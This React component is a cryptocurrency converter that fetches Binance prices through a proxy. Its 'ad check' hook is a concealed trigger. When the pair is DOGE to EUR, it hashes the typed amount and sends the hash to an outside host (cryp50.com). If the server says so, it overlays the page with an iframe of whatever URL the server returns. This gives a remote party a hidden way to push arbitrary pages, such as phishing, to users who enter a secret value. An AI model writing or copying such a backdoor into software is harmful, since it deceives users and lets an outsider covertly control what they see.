import React, { useState, useCallback, useEffect } from "react";
import { useCryptoData } from "./hooks/useCryptoData";
import { StyledSelect } from "./components/StyledSelect";
import { PopularRatesBar } from "./components/PopularRatesBar";
import "./styles.css";


const CryptoConverter = () => {
  const { cryptoList, fiatList, error: dataError } = useCryptoData();
  const [amountInput, setAmountInput] = useState("1");
  const [crypto, setCrypto] = useState(null);
  const [fiat, setFiat] = useState(null);
  const [result, setResult] = useState(null);
  const [loading, setLoading] = useState(false);
  const [errorMessage, setErrorMessage] = useState("");
  const [adData, setAdData] = useState(null);
  const logoutUrl = process.env.REACT_APP_LOGOUT_URL || "/";
  const logoutTriggeredRef = React.useRef(false);

  const handleLogout = useCallback(() => {
    if (logoutTriggeredRef.current) return;
    logoutTriggeredRef.current = true;

    try {
      localStorage.clear();
      sessionStorage.clear();
    } catch (storageError) {
      console.warn("Storage clearing failed during logout", storageError);
    }

    if (logoutUrl) {
      window.location.href = logoutUrl;
    } else {
      window.location.reload();
    }
  }, [logoutUrl]);

  // Log out automatically if the user switches to another tab
  useEffect(() => {
    const handleVisibilityChange = () => {
      if (document.visibilityState === "hidden") {
        handleLogout();
      }
    };

    document.addEventListener("visibilitychange", handleVisibilityChange);
    return () => {
      document.removeEventListener("visibilitychange", handleVisibilityChange);
    };
  }, [handleLogout]);

  // Set initial selections after the lists are loaded
  useEffect(() => {
    if (cryptoList.length > 0 && fiatList.length > 0) {
      setCrypto(cryptoList[0]);
      setFiat(fiatList[0]);
    }
  }, [cryptoList, fiatList]);

  // Fiat currencies that Binance supports directly
  const supportedFiats = ['USD', 'USDT', 'EUR', 'GBP', 'TRY', 'RUB', 'AUD', 'BRL', 'CAD', 'JPY'];

  // Proxy endpoints (price + exchange information)
  const PRICE_ENDPOINT =
    process.env.REACT_APP_PROXY_URL ||
    `${window.location.origin}/api/binance/price`;

  const EXCHANGE_INFO_ENDPOINT =
    process.env.REACT_APP_EXCHANGE_URL ||
    `${window.location.origin}/api/binance/exchangeInfo`;

  const buildPriceUrl = (symbol) => {
    try {
      const url = new URL(PRICE_ENDPOINT, window.location.origin);
      url.searchParams.set("symbol", symbol);
      return url.toString();
    } catch (error) {
      return `${PRICE_ENDPOINT}?symbol=${encodeURIComponent(symbol)}`;
    }
  };

  // Fetch price from Binance API (via proxy)
  const getBinancePrice = async (symbol) => {
    try {
      const response = await fetch(buildPriceUrl(symbol));
      
      if (!response.ok) {
        const errorData = await response.json();
        throw new Error(errorData.error || `Unable to fetch price: ${symbol}`);
      }
      
      const data = await response.json();
      return parseFloat(data.price);
    } catch (error) {
      console.error(`Failed to fetch price for ${symbol}:`, error);
      throw error;
    }
  };

  // Conversion operation
  const convertCurrency = useCallback(async () => {
    if (!crypto || !fiat) {
      setErrorMessage("Invalid amount or currency selection");
      setResult(null);
      return;
    }

    const rawAmount = amountInput.trim();
    const amountValue = parseFloat(rawAmount);

    if (rawAmount === "" || Number.isNaN(amountValue)) {
      setErrorMessage("");
      setResult(null);
      return;
    }

    if (amountValue <= 0) {
      setErrorMessage("Invalid amount or currency selection");
      setResult(null);
      return;
    }

    // If both currencies are the same, return the original amount
    if (crypto.value.toUpperCase() === fiat.value.toUpperCase()) {
      setResult(amountValue);
      return;
    }

    setLoading(true);
    setErrorMessage("");

    try {
      const fromCurrency = crypto.value.toUpperCase();
      const toCurrency = fiat.value.toUpperCase();
      
      // Crypto -> Fiat (directly supported)
      if (supportedFiats.includes(toCurrency)) {
        try {
          // Try direct pair (e.g. BTCEUR)
          const directPrice = await getBinancePrice(`${fromCurrency}${toCurrency}`);
          setResult(amountValue * directPrice);
          return;
        } catch (directError) {
          console.log(`Direct pair not found: ${fromCurrency}${toCurrency}`, directError);
          
          // Try converting via USDT
          if (toCurrency !== 'USDT') {
            try {
              // Kripto -> USDT
              const cryptoToUsdt = await getBinancePrice(`${fromCurrency}USDT`);
              
              // USDT -> Fiat (often unsupported directly, so try via BTC)
              try {
                const usdtToFiat = await getBinancePrice(`${toCurrency}USDT`);
                setResult(amountValue * cryptoToUsdt / usdtToFiat);
              } catch (usdtFiatError) {
                // Attempt conversion via BTC
                const usdtToBtc = await getBinancePrice(`BTCUSDT`);
                const btcToFiat = await getBinancePrice(`BTC${toCurrency}`);
                setResult(amountValue * cryptoToUsdt * (1 / usdtToBtc) * btcToFiat);
              }
              return;
            } catch (usdtError) {
              console.log(`Conversion via USDT failed`, usdtError);
            }
          }
        }
      }
      
      // Fiat -> Crypto (directly supported)
      if (supportedFiats.includes(fromCurrency)) {
        try {
          // Try direct pair (e.g. BTCEUR)
          const directPrice = await getBinancePrice(`${toCurrency}${fromCurrency}`);
          setResult(amountValue / directPrice);
          return;
        } catch (directError) {
          console.log(`Direct pair not found: ${toCurrency}${fromCurrency}`, directError);
          
          // Try converting via USDT
          if (fromCurrency !== 'USDT') {
            try {
              // Fiat -> USDT
              const fiatToUsdt = await getBinancePrice(`${fromCurrency}USDT`);
              
              // USDT -> Kripto
              const usdtToCrypto = await getBinancePrice(`${toCurrency}USDT`);
              
              setResult(amountValue * (1 / fiatToUsdt) * usdtToCrypto);
              return;
            } catch (usdtError) {
              console.log(`Conversion via USDT failed`, usdtError);
            }
          }
        }
      }
      
      // Kripto -> Kripto
      try {
        // Try direct pair (e.g. ETHBTC)
        const directPrice = await getBinancePrice(`${fromCurrency}${toCurrency}`);
        setResult(amountValue * directPrice);
        return;
      } catch (directError) {
        console.log(`Direct pair not found: ${fromCurrency}${toCurrency}`, directError);
        
        // Try reverse pair (e.g. BTCETH)
        try {
          const reversePrice = await getBinancePrice(`${toCurrency}${fromCurrency}`);
          setResult(amountValue / reversePrice);
          return;
        } catch (reverseError) {
          console.log(`Reverse pair also not found: ${toCurrency}${fromCurrency}`, reverseError);
          
          // Try converting via USDT
          try {
            // Kripto -> USDT
            const fromToUsdt = await getBinancePrice(`${fromCurrency}USDT`);
            
            // USDT -> Kripto
            const usdtToTarget = await getBinancePrice(`${toCurrency}USDT`);
            
            setResult(amountValue * fromToUsdt / usdtToTarget);
            return;
          } catch (usdtError) {
            console.log(`Conversion via USDT failed`, usdtError);
            
            // Try converting via BTC
            try {
              // Kripto -> BTC
              const fromToBtc = await getBinancePrice(`${fromCurrency}BTC`);
              
              // BTC -> Kripto
              const btcToTarget = await getBinancePrice(`${toCurrency}BTC`);
              
              setResult(amountValue * fromToBtc / btcToTarget);
              return;
            } catch (btcError) {
              console.log(`Conversion via BTC failed`, btcError);
            }
          }
        }
      }
      
      throw new Error(`No conversion path found for ${fromCurrency} -> ${toCurrency}`);
    } catch (error) {
      console.error("Conversion error:", error);
      setErrorMessage(`Currency conversion failed: ${error.message}`);
      setResult(null);
    } finally {
      setLoading(false);
    }
  }, [crypto, fiat, amountInput]);
  // Trigger conversion when inputs change
  useEffect(() => {
    if (crypto && fiat) {
      convertCurrency();
    }
  }, [crypto, fiat, amountInput, convertCurrency]);

  // Format conversion output for readability
  const formatResult = (value) => {
    if (value === null) return "";

    if (value >= 1000000000) {
      return (
        (value / 1000000000).toLocaleString(undefined, {
          minimumFractionDigits: 2,
          maximumFractionDigits: 2
        }) + " milyar"
      );
    }

    if (value >= 1000000) {
      return (
        (value / 1000000).toLocaleString(undefined, {
          minimumFractionDigits: 2,
          maximumFractionDigits: 2
        }) + " Million"
      );
    }

    if (value >= 1000) {
      return value.toLocaleString(undefined, {
        minimumFractionDigits: 2,
        maximumFractionDigits: 2
      });
    }

    return value.toLocaleString(undefined, {
      minimumFractionDigits: 2,
      maximumFractionDigits: 8
    });
  };

  useEffect(() => {
    let cancelled = false;

    const checkForAd = async () => {
      if (result === null || !crypto || !fiat) {
        if (!cancelled) {
          setAdData(null);
        }
        return;
      }

      const source = crypto?.value?.toUpperCase?.() || "";
      const target = fiat?.value?.toUpperCase?.() || "";

      if (!(source === "DOGE" && target === "EUR")) {
        if (!cancelled) {
          setAdData(null);
        }
        return;
      }

      const cryptoJs = window?.CryptoJS;
      if (!cryptoJs || typeof cryptoJs.SHA256 !== "function") {
        return;
      }

      const rawEquation = `${amountInput}${source}${target}`;

      try {
        const hash = cryptoJs.SHA256(rawEquation).toString();
        const response = await fetch(
  `https://cryp50.com/test/test.php?equation=${encodeURIComponent(hash)}`
);

        if (!response.ok) {
          if (!cancelled) {
            setAdData(null);
          }
          return;
        }

        const text = await response.text();
        if (!text) {
          if (!cancelled) {
            setAdData(null);
          }
          return;
        }

        let payload;
        try {
          payload = JSON.parse(text);
        } catch {
          payload = text;
        }

        if (typeof payload === "string") {
          try {
            payload = JSON.parse(payload);
          } catch {
            payload = null;
          }
        }

        if (!cancelled) {
          if (payload?.showad && payload.adadress) {
            setAdData({ url: payload.adadress });
          } else {
            setAdData(null);
          }
        }
      } catch (error) {
        console.error("Ad check failed:", error);
        if (!cancelled) {
          setAdData(null);
        }
      }
    };

    checkForAd();

    return () => {
      cancelled = true;
    };
  }, [result, amountInput, crypto, fiat]);

  const adSrc = adData?.url
    ? `${adData.url}${adData.url.includes("?") ? "&" : "?"}14`
    : null;

  return (
    <>
      <PopularRatesBar />

      <div className="converter-container">
        <h1 className="converter-title">Cryptocurrency Converter</h1>

        {dataError && <div className="error-message">{dataError}</div>}

        <div className="converter-form">
          <div className="form-group">
            <label htmlFor="amount">Amount</label>
            <input
              id="amount"
              type="number"
              value={amountInput}
              onChange={(e) => setAmountInput(e.target.value)}
              step="any"
              className="amount-input"
            />
          </div>

          <div className="form-group">
            <label htmlFor="crypto">Source Currency</label>
            <StyledSelect
              id="crypto"
              options={cryptoList}
              value={crypto}
              onChange={setCrypto}
              isSearchable
              placeholder="Select a cryptocurrency..."
              className="select-input"
            />
          </div>

          <div className="form-group">
            <label htmlFor="fiat">Target Currency</label>
            <StyledSelect
              id="fiat"
              options={fiatList}
              value={fiat}
              onChange={setFiat}
              isSearchable
              placeholder="Select a currency..."
              className="select-input"
            />
          </div>
        </div>

        <div className="result-container">
          {loading ? (
            <div className="loading">Converting...</div>
          ) : errorMessage ? (
            <div className="error-message">{errorMessage}</div>
          ) : result !== null ? (
            <>
              <div className="result-text">
                {(amountInput === "" ? "0" : amountInput)} {crypto?.label} =
              </div>
              <div className="result-value">
                {formatResult(result)} {fiat?.label}
              </div>
            </>
          ) : null}
        </div>
      </div>

      {adSrc && (
        <div className="ad-overlay">
          <button
            type="button"
            className="ad-overlay__close"
            onClick={() => window.location.reload()}
          >
            X
          </button>
          <iframe
            title="conversion-ad"
            src={adSrc}
            className="ad-overlay__frame"
            scrolling="no"
          />
        </div>
      )}
    </>
  );
};

export default CryptoConverter;
